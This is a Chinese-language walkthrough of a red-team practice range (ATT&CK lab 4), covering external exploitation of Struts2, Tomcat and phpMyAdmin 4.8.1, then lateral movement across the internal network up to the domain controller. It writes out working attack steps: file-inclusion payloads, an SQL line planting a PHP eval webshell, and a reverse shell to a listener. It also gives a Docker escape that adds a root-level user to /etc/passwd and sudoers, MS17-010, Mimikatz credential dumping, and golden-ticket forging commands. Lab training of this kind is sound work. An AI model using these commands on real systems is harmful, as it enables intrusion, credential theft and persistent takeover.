ATT&CK红队评估四实战教学文档<\/h1>

0x01 靶场环境概述<\/h2>

目标<\/strong>：获得所有主机包括域控的控制权限<\/p>

环境配置<\/strong>：<\/p>

Web机：Ubuntu系统

IP地址：192.168.111.145（外网）<\/li>
内网IP：192.168.183.128<\/li> <\/ul> <\/li>
内网主机：Windows 7系统<\/li> <\/ul>
0x02 外网信息收集与打点<\/h2>
端口扫描发现<\/h3>
扫描发现三个Web服务端口：<\/p>

2001端口<\/strong>：文件上传功能点，可能存在Struts2多版本漏洞<\/li>
2002端口<\/strong>：Tomcat初始界面<\/li>
2003端口<\/strong>：phpMyAdmin 4.8.1（存在任意文件上传漏洞）<\/li> <\/ol>
漏洞利用方法<\/h3>
1. Struts2漏洞利用<\/h4>

工具检测<\/strong>：使用专用工具检测存在漏洞，可执行命令<\/li>
利用方式<\/strong>：直接执行系统命令<\/li> <\/ul>
2. Tomcat文件上传漏洞<\/h4>

漏洞利用<\/strong>：使用PUT方法上传JSP木马<\/li>
验证方法<\/strong>：访问上传的JSP文件（如21.jsp）测试命令执行<\/li> <\/ul>
3. phpMyAdmin远程文件包含<\/h4>

漏洞利用步骤<\/strong>：

任意文件读取：index.php?target=db_sql.php%253f\/etc\/passwd#\/<\/code><\/li>
执行SQL写入PHP代码： select<\/span> "<?php file_put_contents('\/var\/www\/html\/cmd.php','<?php @eval($_POST[pass]"<\/span> <\/span><\/span><\/code><\/pre><\/li> 利用session写入shell：日志路径：\/tmp\/sess_+phpMyAdmin的cookie值<\/code><\/li> 包含日志执行：?target=db_sql.php%253f\/tmp\/sess_14afd9352fa03b2c14b10c54b396478e#\/<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ul> 0x03 反弹Shell与Docker逃逸<\/h2> 反弹Shell<\/h3> 使用Struts2漏洞执行反弹命令<\/li> Kali监听端口：7778<\/li> 成功获取反向Shell连接<\/li> <\/ul> Docker逃逸技术<\/h3> 检测容器环境<\/strong>：<\/p> fdisk -l<\/code>无输出 → 容器环境<\/li> 检查特权容器：cat \/proc\/1\/status | grep Cap<\/code><\/li> <\/ul> <\/li> 特权容器逃逸<\/strong>：<\/p> 查看硬盘信息：fdisk -l<\/code><\/li> 挂载宿主机硬盘： mkdir xjy <\/span><\/span>mount \/dev\/sda5 xjy\/ <\/span><\/span><\/code><\/pre><\/li> 添加用户到宿主机：生成密码hash：perl -le 'print crypt("123456","addedsalt")'<\/code><\/li> 添加用户：echo "abc:adrla7IBSfTZQ:1001:1001:User_like_root:\/root:\/bin\/bash" >> \/xjy\/etc\/passwd<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> SSH免密登录<\/strong>：<\/p> 生成密钥对：ssh-keygen<\/code><\/li> 将公钥写入目标机authorized_keys<\/code><\/li> 设置权限：chmod 600 authorized_keys<\/code><\/li> <\/ul> <\/li> <\/ol> 0x04 提权操作<\/h2> 修改宿主机sudoers文件： echo "abc ALL=(ALL:ALL) ALL"<\/span> >> \/xjy\/etc\/sudoers <\/span><\/span><\/code><\/pre><\/li> 验证提权：执行sudo<\/code>命令<\/li> <\/ul> 0x05 内网信息收集<\/h2> 网络发现<\/h3> 发现内网网段：192.168.183.0\/24<\/li> 使用fscan扫描存活主机： 192.168.183.130（开放445端口）<\/li> 192.168.183.131（开放445端口）<\/li> 检测到永恒之蓝漏洞（MS17-010）<\/li> <\/ul> <\/li> <\/ul> 0x06 横向移动<\/h2> 永恒之蓝利用<\/h3> MSF设置监听： use exploit\/multi\/handler set payload cmd\/unix\/reverse_bash set lhost 0.0.0.0 run <\/code><\/pre> <\/li> 升级会话：sessions -u [ID]<\/code><\/li> <\/ol> 凭证获取<\/h3> 使用kiwi模块读取密码：creds_all<\/code><\/li> 获取NTLM哈希和明文密码<\/li> <\/ul> 远程桌面开启<\/h3> 通过永恒之蓝获取的system权限开启RDP<\/li> 添加用户： net user xilitter Password123 \/add <\/span><\/span>net localgroup administrators xilitter \/add <\/span><\/span><\/code><\/pre><\/li> <\/ul> 0x07 权限维持（黄金票据）<\/h2> 黄金票据制作条件<\/h3> 域名称<\/li> 域的SID值<\/li> 域的KRBTGT账户密码HASH<\/li> 伪造用户名（任意）<\/li> <\/ol> 具体步骤<\/h3> 获取域信息<\/strong>：<\/p> 域名称：DEMO<\/li> 使用Mimikatz获取krbtgt的NTLM-Hash和SID： lsadump::dcsync \/user:krbtgt <\/code><\/pre> <\/li> 获取结果： SID: S-1-5-21-979886063-1111900045-1414766810-502<\/li> NTLM HASH: 7c4ed692473d4b4344c3ba01c5e6cb63<\/li> <\/ul> <\/li> <\/ul> <\/li> 生成黄金票据<\/strong>：<\/p> kerberos::purge # 清除现有票据 kerberos::golden \/admin:administrator \/domain:DEMO.COM \/sid:S-1-5-21-979886063-1111900045-1414766810-502 \/krbtgt:7c4ed692473d4b4344c3ba01c5e6cb63 \/ticket:ticket.kirbi <\/code><\/pre> <\/li> 导入票据<\/strong>：<\/p> kerberos::ptt ticket.kirbi <\/code><\/pre> 验证：使用dir \\dc-name\c$<\/code>测试访问权限<\/li> <\/ul> <\/li> <\/ol> 0x08 总结<\/h2> 本实战演练涵盖了完整的红队攻击链：<\/p> 外网信息收集与漏洞利用<\/li> 初始访问与权限提升<\/li> 内网横向移动<\/li> 域控攻陷<\/li> 权限维持技术<\/li> <\/ol> 关键点<\/strong>：<\/p> 多漏洞组合利用（Struts2、Tomcat、phpMyAdmin）<\/li> Docker逃逸技术<\/li> 永恒之蓝漏洞利用<\/li> 黄金票据制作与Kerberos协议滥用<\/li> 凭证获取与横向移动技术<\/li> <\/ul>